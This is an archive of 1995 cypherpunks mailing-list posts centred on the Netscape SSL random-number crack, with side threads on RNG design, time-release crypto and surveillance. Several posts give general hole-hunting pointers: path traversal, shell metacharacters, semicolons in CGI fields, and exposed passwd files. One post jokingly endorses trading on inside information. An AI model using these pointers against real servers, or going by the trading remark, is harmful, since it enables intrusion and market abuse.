I do hope this is just John Markoff's simplification of what Netscape's 
folks said and not an endorsement of security-by-obscurity.
I realize that some data does need to be kept around on disk
or in the program, since obtaining a lot of random bits at the beginning
of every transaction either requires annoying user interactions or
takes too long to get decent quality, and certainly this data
ought to be kept private by the algorithms involved.

One concern I've had about the popular "crunch some bits repeatedly
through MD5" approach to random number generation is that knowing
one sample from the stream (e.g. by doing a transaction with the victim)
gives you the rest of the stream.  There's a way to improve that.

        let X(0) be some number you keep around from a previous
                session, modified by whatever hardware randomness
                is available, and seeded by user input the first time.
        let X(i) = MD5(X(i-1))   
        let Y(i) = hash(X(i)), where hash is something like MD5(key,X(i))
        use Y(i) as the output random number.

This eliminates the ability to determine X(i) or Y(i+1) as a function of Y(i),
since the search space of X(i) is presumably too large to reverse (unlike
the number of bits you can cheaply get in one session).  Keeping some of the
bits of Y(i) around to use in addition to the other key for the hash, or to
key the MD5(X(i-1)) with, may be useful as well.

#---
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Tue, 19 Sep 95 02:30:13 PDT
To: cypherpunks@toad.com
Subject: Re: Caribbean Internet Services? (fwd)
Message-ID: <199509190929.CAA23997@ix.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Tim wrote:
>>> I suspect "Caribbean Data Havens" and "Internet Sites" are further off than
>>> they were a few months ago.

The governments of the affected islands will have to make some tradeoffs -
do they allow providers of these services to operate freely, bringing in
new telecomm facilities so they can get the revenues from (let's keep the
Minnesota AG happy) gambling and other private-communications trade,
or do they leave their telecomm monopolies in place, so they can get the
telecomm revenues which get into government coffers more quickly?
Is there enough market to convince them to open up, which will attract
more services?  How much does being first matter?
#---
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Tue, 19 Sep 95 02:30:19 PDT
To: cypherpunks@toad.com
Subject: Re: Time release crypto
Message-ID: <199509190930.CAA24047@ix.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


>>What minimal requirements would be needed to support encrypted packets/files
>>that a holder could only decrypt after a certain date/time?

Technology can't solve the problem, only help a bit; algorithms
aren't timebound.  In particular, true security depends on only
being able to decrypt if you have the correct information, and there's
no way to create decryption information in the future from 
encryption pieces you have now without being able to create the 
same information now.

Tim's 1993 article suggests spreading data around with 
> independent escrow agents who handle large volumes of messages
> and agree to hold them for various amounts of time. 
and depending on reputations and market forces to ensure honesty. 

> The decryption key to the original message is itself broken
>up into several or many pieces and scattered to a network of
>"remailer"-like agents (they are essentially "remailers into the future,"
>by agreeing as part of their protocol to hold messages for some amount of
time). 

What Tim almost, but not quite, mentions here is Shamir Secret Sharing -
you can split messages into N pieces, of which any M can reconstruct
the message and any M-1 don't contain enough information to resolve 
their equations uniquely, leaving you with _no_ known correct bits.

Tim's message also talked about having lots of data flowing around in 
a remailer-like fashion, but that may not be untraceable by subpoenas,
#---
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Tue, 19 Sep 95 02:55:00 PDT
To: hacknetscape@c2.org
Subject: Fundamental Netscape hack
Message-ID: <199509190954.CAA24686@ix.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Of course, one of the most serious security problems with Netscape servers
is that they run on machines sitting out there on the Internet where
anybody who can browse their services can attack them - that 128-bit
bullet-proof iron-clad front door isn't much help if the garage door is
unlocked because of some sendmail bug.  For most web applications,
the big security need is to send a chunk of encrypted data to some server
that will decrypt it and get you credit-card number or whatever,
but the standard SSL and S/HTTP protocols want to decrypt the data
to plaintext on the Web server before it can do anything like that.

(OK, I guess this doesn't win me a T-Shirt, since enough other people
have said similar things, but do I at least get a gif of the shirt
and a crayon so I can roll my own?  :-)  Good work, folks!
#---
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Cromwell <rjc@clark.net>
Date: Tue, 19 Sep 95 00:03:38 PDT
To: perry@piermont.com
Subject: Re: NYT on Netscape Crack
In-Reply-To: <199509190355.XAA01329@frankenstein.piermont.com>
Message-ID: <199509190703.DAA03247@clark.net>
MIME-Version: 1.0
Content-Type: text/plain



> 
> I suspect that there are far more flaws in Netscape. String buffer
> overflows are another good guess here -- they are probably rampant
> through the code both for the browser and the commerce server they
> sell. I can't prove it myself, of course, given that I don't have the
> time to rip the thing apart, but the same folks never seemed to learn
> their lesson in release after release when they worked at NCSA, and
> the only thing thats probably keeping their dignity here is the lack
> of distributed source code.

  I doubt this in the case of the browser. Atleast as far as the
parsing is concerned. There may be a buffer overflow for example,
when you input the url in the "open" window, but that has to be
done manually by the user and isn't a threat, like a "rogue homepage"
would be. The reason I doubt string buffer overflows in the case of
the browser is that it seems to be written in some object oriented
language, perhaps C++ (or maybe just oo-C like BSAFE). Once you
have a general robust String class, you can prove it's non-overflowable,
and therefore no composition of operations from the browser code will
overflow it (unless of course, you break language safety by using
casts and pointer manipulation) Secondly, Netscape has been very
robust in my own testing against these common bugs. One of the things
I've done lately is "tiger team" attacks against servers and browsers.
(of course, sendmail is a brilliant counter example)
(if you can find a call to gets() in Netscape, I will instantly 
retreat ;-) )

  Netscape's security maybe bad, but the rest of their browser, or atleast
their development process, is good engineering. They've built a very
complex application, fairly quickly, that runs with very few bugs,
across a wide variety of operating systems and GUI's, while maintaining
a consistent user interface and feature set. Netscape 2.0 incorporated
Java, LiveObjects, and more HTML3.0 in almost record time. (I wasn't
expecting a Java capable Netscape until atleast December). I'd like to
see Microsoft develop a piece of code that quickly that runs on
umteen different flabors of Unix, MacOS, and Win3.1/95/NT. Hell, they
can't even write code that runs smoothly across all three
flavors of their operating system.

-Ray


 
   





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Cromwell <rjc@clark.net>
Date: Tue, 19 Sep 95 00:34:36 PDT
To: sameer@c2.org (sameer)
Subject: Re: NYT on Netscape Crack
In-Reply-To: <199509190713.AAA01128@infinity.c2.org>
Message-ID: <199509190734.DAA09824@clark.net>
MIME-Version: 1.0
Content-Type: text/plain


> 
> > 
> >   I doubt this in the case of the browser. Atleast as far as the
> > parsing is concerned. There may be a buffer overflow for example,
> 
> 	Buffer overflow seems like a much greater concern when dealing
> with a server. Particularly one which is supposedly "secure", and
> accessing "secured" documents. Even with the server running as
> 'nobody' if someone can implement buffer overflow to get access to
> documents they shouldn't then that would count as a pretty significant
> hack.

   Right. Some other common ones are ".." and shell meta characters
in paths. Also, accessing files that you don't have permissions
to. Even if the server is perfect, the setup could be bad. For
instance, if you use CERN's Authentication scheme for protecting
URL hierarchies, do not put the passwd/group file within the
hierarchy. I've noticed this before on some servers, like

http://www.isp.com/company1/passwd   contains the passwd file for the
http://www.isp.com/company1/   URL directory. Although it is convenient
to store the passwd file within the hierarchy it is protecting, care
must be taken to make it unreadable by normal HTTP requests. It's better 
to put it in a configuration directory somewhere where no server
has access to. (I've seen this mistake plenty of times)

  A barebone's web server is a pretty simple piece of a software compared
to a browser (or sendmail), so it should be possible to make them
much more secure.

-Ray




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shields@tembel.org (Michael Shields)
Date: Mon, 18 Sep 95 21:40:47 PDT
To: jlasser@rwd.goucher.edu (Jon Lasser)
Subject: Re: PGP for Linux 1.2.8
In-Reply-To: <Pine.SUN.3.91.950919000335.1167A-100000@rwd.goucher.edu>
Message-ID: <m0suuTF-000LjWC@yage.tembel.org>
MIME-Version: 1.0
Content-Type: application/pgp

PGP message


From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shields@tembel.org (Michael Shields)
Date: Mon, 18 Sep 95 23:14:45 PDT
To: merriman@arn.net (David K. Merriman)
Subject: Re: PGP for Linux 1.2.8
In-Reply-To: <199509190604.BAA10003@arnet.arn.net>
Message-ID: <m0suvwi-000DMsC@yage.tembel.org>
MIME-Version: 1.0
Content-Type: text/plain


> At 04:39 AM 9/19/95 +0000, you "wrote":
> >Attachment Converted: D:\DOWNLOAD\MIME\RePGPfor.8
> >
> 
> I, for one, don't need Mystery MIME Attachments cluttering up my drive. If
> it's worth saying, then *say* it.

I really don't know why any mailers call a monopart MIME message an
"attachment".

In that message, I suggested that the list be gated to the new hierarchy
crypto.cypherpunks for the convenience of netnews without the visibility
of Usenet, and offered to run a gateway on news.tembel.org.
-- 
Shields.



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Tue, 19 Sep 95 07:00:23 PDT
To: adam@lighthouse.homeport.org (Adam Shostack)
Subject: Re: NYT on Netscape Crack
In-Reply-To: <199509191349.JAA04365@homeport.org>
Message-ID: <199509191355.GAA26932@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


> 	Don't forget system(), which was a major source of holes in the NCSA server.  
> Also, CGI scripts, especially those that run under perl or sh, would be a good 
> place to look for holes.  Don't forget to see what happens when you put 
> semi-colons in the data field of various fields, such as mailto:'s.
> 

	A CGI-script hole doesn't count as a netscape server hole.
system() is probably pretty bad though. 

-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:	 510-601-9734
An Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org (or login as "guest")			sameer@c2.org



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Tue, 19 Sep 95 07:08:27 PDT
To: aba@atlas.ex.ac.uk
Subject: Re: NYT on Netscape Crack
In-Reply-To: <28592.9509191106@exe.dcs.exeter.ac.uk>
Message-ID: <199509191403.HAA27655@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


> 
> Sure that's hard to notice, but what you describe was an accident, ie
> the code wasn't working as you thought it was.
> 

	Also, the fact that the source isn't available meant that it
took quite some work to reveal the hole. In Eric's case, with
available source, his mistake was found and corrected.

> 
> The moral in netscapes story is that closed systems are bad news.
> These things ideally need open review.  And of course designing things
> with the expectation that they are secure with the *given* that the
> full algorithm is known.

	Yes.

> 
> Real shame because the rest of the software is very innovative
> compared to other browsers, and apparently good quality.  Also may be
> a set back for net commerce, which is bad news.
> 

	Well if we hammer at 'em enough maybe they'll get their
security fixed. I still use netscape. I'm not going to stop using
netscape. (I'm not going to use netscape for anything sensitive
though, that's for sure.)

-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:	 510-601-9734
An Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org (or login as "guest")			sameer@c2.org




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Tue, 19 Sep 95 07:40:31 PDT
To: cypherpunks@toad.com
Subject: articles
Message-ID: <199509191435.HAA00275@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


	If you could, please send me the name of the reporter and
contact information for any articles you see regarding the netscape
hack.

Thanks,
-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:	 510-601-9734
An Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org (or login as "guest")			sameer@c2.org



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: m5@dev.tivoli.com (Mike McNally)
Date: Tue, 19 Sep 95 05:40:36 PDT
To: Eric Young <eay@mincom.oz.au>
Subject: Re: NYT on Netscape Crack
In-Reply-To: <43lu3k$7q6@tera.mcom.com>
Message-ID: <9509191238.AA09042@alpha>
MIME-Version: 1.0
Content-Type: text/plain



Eric Young writes:
 > >   Sigh.  For your information the security code for 1.x versions of
 > > netscape was not even written by someone from NCSA.  The current
 > > security team (which does not include the person who did the 1.x
 > > version) also does not include anyone from NCSA.  While I can't
 > 
 > I will defend Netscapes code on the point about the RNG even though I 
 > have not seen any.  I assume the Netscape code is quite large and each 
 > release would have to pass various fuctionality tests.  How can you test 
 > that the RND seeding is wrong?

The seeding isn't "wrong"; it's a design flaw.  (At least that's my
understanding; maybe I missed something.)

 > You have to actually look at the code, the  number coming out are
 > still random.

Two words: "design review".

 > This sort of error can only be checked by reading the code and
 > specifically looking at critical routines like this the RNG seeding
 > routines.

Uhh... OK.  Sounds like a plan to me.  For critical pieces of code
like that, having repeated exhaustive design/implementation reviews
should be a matter of course.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
| Nobody's going to listen to you if you just | Mike McNally (m5@tivoli.com) |
| stand there and flap your arms like a fish. | Tivoli Systems, Austin TX    |
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Tue, 19 Sep 95 07:44:49 PDT
To: stewarts@ix.netcom.com (Bill Stewart)
Subject: Re: Fundamental Netscape hack
In-Reply-To: <199509190954.CAA24686@ix.ix.netcom.com>
Message-ID: <199509191439.HAA00501@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


> (OK, I guess this doesn't win me a T-Shirt, since enough other people
> have said similar things, but do I at least get a gif of the shirt
> and a crayon so I can roll my own?  :-)  Good work, folks!

	GIFs of the shirt will be available on the web page as soon as
they are designed. (Times like these make me wish I owned a mac.)

-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:	 510-601-9734
An Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org (or login as "guest")			sameer@c2.org



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: patrick@Verity.COM (Patrick Horgan)
Date: Tue, 19 Sep 95 07:44:14 PDT
To: tcmay@got.net
Subject: Re: Caribbean Internet Services?
Message-ID: <9509191440.AA13167@cantina.verity.com>
MIME-Version: 1.0
Content-Type: text/plain


> (Yes, there have been more hurricanes this year than in most years...not
> clear if it's just a Poisson fluctuation, or symptomatic of deeper weather
> pattern changes.)
> 
See September 95 Popular Science, article, "Hurricane Alert" in which the
worlds leading hurricane scientist says that we're only just seeing the
beginning of several years of large numbers of large hurricanes.

Patrick
   _______________________________________________________________________
  /  These opinions are mine, and not Verity's (except by coincidence;).  \
 |                                                       (\                |
 |  Patrick J. Horgan         Verity Inc.                 \\    Have       |
 |  patrick@verity.com        1550 Plymouth Street         \\  _ Sword     | 
 |  Phone : (415)960-7600     Mountain View                 \\/    Will    | 
 |  FAX   : (415)960-7750     California 94303             _/\\     Travel | 
  \___________________________________________________________\)__________/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bruce Schneier <schneier@winternet.com>
Date: Tue, 19 Sep 95 05:57:40 PDT
To: cypherpunks@toad.com
Subject: Errors in Applied Cryptography, 2nd Edition
Message-ID: <199509191257.HAA09502@icicle>
MIME-Version: 1.0
Content-Type: text



I have taken a three stage approach to reducing the number of
errors in the second edition:

     1.  Correct the errors from the first edition.
     2.  Ensure that I don't create any new errors while writing
          the new material for the second edition.
     3.  Make sure that additional errors don't creep in during
          the production of the second edition.

In order....  I have done a lot more than incorporate all the
corrections from the errata into the second edition.  Minor
things, too trivial to make the errata list, were also corrected. 
The first edition was translated into French, and the translator
sent me hundreds of queries: things that were unclear, ambiguous,
or erroneous.  All of those queries resulted in changes to the
second-edition manuscript.

I was a lot more careful adding new material, reading it over
several times to ensure accuracy.  And a lot of other people read
the chapters over, too.  For the first edition, I asked about a
dozen people to proofread the manuscript for me.  Most people
read the first chapters carefully, and then petered out somewhere
in the middle.  This time I asked about seventy people to each
read a chapter (or two)--a chapter within their area of
expertise.  Each chapter was edited by at least two people, often
more.  Additionally, two people were paid to read the entire book
for accuracy and comprehensibility.

I learned a lot about the publishing process during the
production of the first edition.  For the first edition, I had no
control of any of the production decisions.  The copyeditor added
errors to the manuscript.  Some computer idiot lost all of my
italics, boldface, superscripting, and subscripting while
translating my files from my word processor to their page layout
program.  The proofreader didn't catch errors that the production
people added.  I had almost no time to review the manuscript at
any of the stages.  This time around I was able to choose my own
copyeditor, proofreader, and indexer.  In fact, there were two
separate rounds of copyediting with two different copyeditors. 
The proofreader is not only the most meticulous proofreader I
know, but someone who knows enough math to catch errors in the
equations.  I verified all file translations myself.  And I
reviewed the copyedited manuscript twice, and two separate passes
of page proofs.

I'm not stupid enough to state that the book is 100% error-free,
but I am confident that there are far fewer errors in the second
edition than there were in the first.  I was embarrassed at some
of the errors in the first edition, and I put a lot of effort
into making sure it doesn't happen again.

Bruce

**************************************************************************
* Bruce Schneier
* Counterpane Systems         For a good prime, call 391581 * 2^216193 - 1
* schneier@counterpane.com
**************************************************************************



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jsw@neon.netscape.com (Jeff Weinstein)
Date: Tue, 19 Sep 95 01:14:28 PDT
To: cypherpunks@toad.com
Subject: Re: NYT on Netscape Crack
In-Reply-To: <199509190300.XAA05027@pipe4.nyc.pipeline.com>
Message-ID: <43lu3k$7q6@tera.mcom.com>
MIME-Version: 1.0
Content-Type: text/plain


In article <199509190355.XAA01329@frankenstein.piermont.com>, perry@piermont.com (Perry E. Metzger) writes:
> 
> Markoff's article in the Times says:
> >    Netscape officials said today that they would strengthen
> >    the system, by making it significantly harder to determine
> >    the random number at the heart of their coding system. They
> >    said they would no longer disclose what data would be used
> >    to generate the random numbers.
> 
> Not, of course, that they disclosed it before -- it was found by
> reverse engineering the distributed executable. Not, of course, that
> they have a choice in the matter of whether to disclose it -- they
> will be "disclosing" how its done as soon as they release the
> code. Not, of course, that security through obscurity does any good --
> it just magnifies the pain.

  Regardless of what Markoff implies, we do not intend to depend on
security through obscurity.

> I suspect that there are far more flaws in Netscape. String buffer
> overflows are another good guess here -- they are probably rampant
> through the code both for the browser and the commerce server they
> sell. I can't prove it myself, of course, given that I don't have the
> time to rip the thing apart, but the same folks never seemed to learn
> their lesson in release after release when they worked at NCSA, and
> the only thing thats probably keeping their dignity here is the lack
> of distributed source code.

  Sigh.  For your information the security code for 1.x versions of
netscape was not even written by someone from NCSA.  The current
security team (which does not include the person who did the 1.x
version) also does not include anyone from NCSA.  While I can't
guarantee that such buffer overflow error don't exist in our
current products since I have not personally examined every line
of code, your generalization from experience with mosaic is bogus.
In the places in the code that I have seen where it looked like such
errors could have crept in, I have found that the correct checks
for buffer overflow have been in place.

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "P.J. Ponder" <ponder@wane-leon-mail.scri.fsu.edu>
Date: Tue, 19 Sep 95 05:38:15 PDT
To: cypherpunks@toad.com
Subject: Re: taxonomies of 'real money' and e-cash
In-Reply-To: <Pine.3.89.9509190824.C29439-0100000@wane3.scri.fsu.edu>
Message-ID: <Pine.3.89.9509190811.D29503-0100000@wane3.scri.fsu.edu>
MIME-Version: 1.0
Content-Type: text/plain


On the 18th, Tim May wrote:
> 
> I wasn't saying they are all on the same footing, or are all separate and
> compartmentalizable things. Clearly some of them are just slightly
> different "flavors" of other things. I listed a bunch of them not as a
> taxonomy or ontology, but as an illustration that there are many kinds of
> financial dealings, many kinds of roles played.
> 
> That the real world has so many flavors of financial things could of course
> be due to inertia and ignorance, partly. But there are also different
> functionalities, and costs. Fitting the different needs, the different
> roles of the players. I won't go on and on, as my last post on this I think
> hit the main points, but consider how many flavors we have just of
> "checks": the "ordinary" checks we write, counter checks, dual-endorser
> checks, traveller's checks, and so on. (If you are arguing that only
> "digital cash" is a real issue, and all other constructs are "small matters
> of programming," then we disagree profoundly.)

My mistake then.  You obviously have in mind some things much more subtle 
and more logically removed from money, or currency, or even liquidity 
than what I thought you were referring to.  I'm going back to reading the 
list in the mornings.

--PJ

 . . . .

> --Tim May
> 
> ---------:---------:---------:---------:---------:---------:---------:----
> Timothy C. May              | Crypto Anarchy: encryption, digital money,
> tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
> Corralitos, CA              | knowledge, reputations, information markets,
> Higher Power: 2^756839      | black markets, collapse of governments.
> "National borders are just speed bumps on the information superhighway."
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Tue, 19 Sep 95 09:01:41 PDT
To: cypherpunks@toad.com
Subject: SFChron
Message-ID: <199509191556.IAA09022@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


'Security Hole Found in Netscape Software'
C1.4 C4.1

	Choice quotes:

"But the breach raises the issue whether Netscape's software...will
ever be safe enough..."

"Mike Homer, vice president of marketing for Netscpae, said that
recent breaches do not mean the products are flawed"

"But if Netscape thinks one patch is all it will take, they are
mistaken, said Sameer Parekh"

-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:	 510-601-9734
An Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org (or login as "guest")			sameer@c2.org



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Erik E. Fair"  (Time Keeper) <fair@clock.org>
Date: Tue, 19 Sep 95 09:04:52 PDT
To: Eric Young <jsw@neon.netscape.com>
Subject: Verification of Random Number Generators
Message-ID: <v02110102ac849090d9fe@[17.255.9.110]>
MIME-Version: 1.0
Content-Type: text/plain


At 2:20 9/19/95, Eric Young wrote:

>Now I had not noticed this, my library runs like a charm and things
>appear random from the random number generator.  This sort of error can
>only be checked by reading the code and specifically looking at critical
>routines like this the RNG seeding routines.  The advantage of my code
>being public is that some-one like Mike can have a look and pick up
>problems like this.
>The moral of the story I suppose is to be
>paranoid about checking routines relating to RNG.

Just an idle thought: it might be possible to do a probabalistic
verification of a RNG by sampling it over some number of samples, and
statistically analyzing the sample space. This would be analysis under the
model of "RNG as black box" as opposed to (or rather, if you're smart, in
addition to) code inspection & review. Any statisticians among us?

Erik Fair






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James Caldwell" <jcaldwel@iquest.net>
Date: Tue, 19 Sep 95 19:07:17 PDT
To: cypherpunks@toad.com
Subject: Re: Anonymous WWW proxies
Message-ID: <m0svEWz-00064DC@dorite1.iquest.net>
MIME-Version: 1.0
Content-Type: text/plain


On 17 Sep 95 at 11:24, Aleph One wrote:

> Points taken. But I belive the are (or will be patches) for CERN to
> d SSL. Check the SSLeay ssl-user mailing list.
 
> While we talking abut anonymous proxies. I always wanted to set up
> an IP anonymous proxie using Linux IP tunnel and maybe also IP
> Masquareding. This would allow people to have anonymous Web Servers,
> etc. (But as anything it would probably be abused for hacking, etc
> at no end). Any commments?

You can add a bit of protection for yourself to this, just some way 
of preventing the unwanted from using the service and terminating 
abusers.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James Caldwell" <jcaldwel@iquest.net>
Date: Tue, 19 Sep 95 19:13:01 PDT
To: cypherpunks@toad.com
Subject: Re: AOL monitoring
Message-ID: <m0svEca-00065qC@dorite1.iquest.net>
MIME-Version: 1.0
Content-Type: text/plain


On 19 Sep 95 at 15:45, Thomas Grant Edwards wrote:

> On Sun, 17 Sep 1995, Sal Denaro wrote:
> 
> > 2) My .newsrc file can tell anyone that I read alt.hackers and
> > alt.2600
> 
> Hmmm...potential new crypto product...a "secure" newsreader with
> encrypted .newsrc? 

How hard is it to record downloaded newsgroups/msgs from the news
server? Here locally, I just found out that a group of local internet
providers use a centrally located NNTP server. 

Bummer.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: keelings@wu1.wl.aecl.ca (S. Keeling)
Date: Tue, 19 Sep 95 07:28:57 PDT
To: cypherpunks@toad.com
Subject: Time release crypto
Message-ID: <9509191427.AA23942@wu1.wl.aecl.ca>
MIME-Version: 1.0
Content-Type: text/plain


Incoming from Stephen D. Williams:
> 
> What minimal requirements would be needed to support encrypted packets/files
> that a holder could only decrypt after a certain date/time?
> (Time Escrow?)

	How do you expect the system to reliably tell accurate time?
What's to stop anyone from just resetting the clock to get at what
they want?

	As always, physical access to the system breaks all security.

-- 

 "Remember, obsolescence (Win95) isn't an accident;  it's an art form!" 
   keelings@wu1.wl.aecl.ca       s. keeling,   aecl - whiteshell labs



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Tue, 19 Sep 95 06:30:58 PDT
To: stewarts@ix.netcom.com
Subject: Unabomber ?
Message-ID: <199509191330.JAA13584@pipe4.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


Bill,


Both the Times and Post report that only the Post is publishing 
the FC-piece.


I'm scanning it now and will offer it in a while -- it's a 
long, long pole.


I'll ask by this post if someone wants to offer it FTP, I can 
only do multiple e-mail bites from this hole.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Tue, 19 Sep 95 06:36:44 PDT
To: John Young <jya@pipeline.com>
Subject: Re: NYT on Netscape Crack
Message-ID: <199509191336.JAA14981@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:00 PM 9/18/95 -0400, John Young wrote:
>   The New York Times, September 19, 1995, pp. A1, D21.
>
>
>   Security Flaw Is Discovered In Software Used in Shopping
>
>   By John Markoff

On the Front Page, *above* the fold.  Perhaps John was trying to make up for
being scooped by the WSJ on the SSL Crack story.

DCF

"The key to the age may be this, or that, or the other, as the young orators
describe; the key to all ages is-Imbecility; imbecility in the vast majority
of men, at all times, and, even in heroes, in all but certain eminent
moments; victims of gravity, custom, and fear." -- Ralph Waldo Emerson 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@homeport.org>
Date: Tue, 19 Sep 95 06:49:50 PDT
To: sameer <sameer@c2.org>
Subject: Re: NYT on Netscape Crack
In-Reply-To: <199509190713.AAA01128@infinity.c2.org>
Message-ID: <199509191349.JAA04365@homeport.org>
MIME-Version: 1.0
Content-Type: text/plain



| 	Buffer overflow seems like a much greater concern when dealing
| with a server. Particularly one which is supposedly "secure", and
| accessing "secured" documents. Even with the server running as
| 'nobody' if someone can implement buffer overflow to get access to
| documents they shouldn't then that would count as a pretty significant
| hack.

	Don't forget system(), which was a major source of holes in the NCSA server.  
Also, CGI scripts, especially those that run under perl or sh, would be a good 
place to look for holes.  Don't forget to see what happens when you put 
semi-colons in the data field of various fields, such as mailto:'s.

Adam
-- 

"It is seldom that liberty of any kind is lost all at once."
					               -Hume







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Tue, 19 Sep 95 09:51:07 PDT
To: cypherpunks@toad.com
Subject: Why Surveillance State Needs Toy Crypto
Message-ID: <ac843be218021004b02f@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 8:19 AM 9/19/95, Christian Wettergren wrote:
>What I don't understand is why the law-enforcement is so concerned
>about bruting things. It is probably quite easy to tap the keyboard,
>smart force, exchange the binary with the real thing etc for them?
>
>(Unless they want to read it all from a nice tipped-back armchair in
>a certain location? :-))
>
>What I'm saying is that this kind of attack should work quite easily
>in the one-by-one cases, but not on a large scale, malicious data,
>trojan horses, outright bugging. So why all this Clipper (son-of-X)
>fuss?

It's really about the threat model.

Sure, the authorities _could_ place microphones in offices and homes, but
this requires huge amounts of effort and is only justified when the target
is really, really important.

As Whit Diffie has said (and this makes about the fifth time I've credited
him on this, so I hope he's satisfied), widespread surveillance must attack
the communication channels, not just attack the origins and destinations.
That is, the _economics_ of mandating weak crypto are vastly more efficient
for the surveillance state.

--Tim May

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Tue, 19 Sep 95 09:51:14 PDT
To: cypherpunks@toad.com
Subject: Investing on Information We Get Here
Message-ID: <ac843ff11a021004a43e@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 1:35 PM 9/19/95, Duncan Frissell wrote:
>At 11:00 PM 9/18/95 -0400, John Young wrote:
>>   The New York Times, September 19, 1995, pp. A1, D21.
>>
>>
>>   Security Flaw Is Discovered In Software Used in Shopping
>>
>>   By John Markoff
>
>On the Front Page, *above* the fold.  Perhaps John was trying to make up for
>being scooped by the WSJ on the SSL Crack story.

Also front page, above the fold, for the "San Jose Mercury News," the
newspaper of record of the Silicon Valley.

And CNBC is reporting the story on its hourly updates of the news.

(These computer lists are really great for investors! I heard about the
Apple problems a few days before they hit the street, and was able to
unload a bunch of shares at $45, a day before it dropped, now down to
around $36. "He who hesitates to act on inside information is lost.")

P.S. On Netscape, I've finally decided to do some buying. Sure, this latest
flaw is another embarrassment. But more deals and link-ups than ever are
being inked, and they've got the resources to really spruce up Navigator
and related products. I just don't see too many competitors on the horizon.

Actually, I was planning to buy some Netscape stock, now that the IPO froth
has settled. And since I have this info on the flaw, I _have_ to buy it,
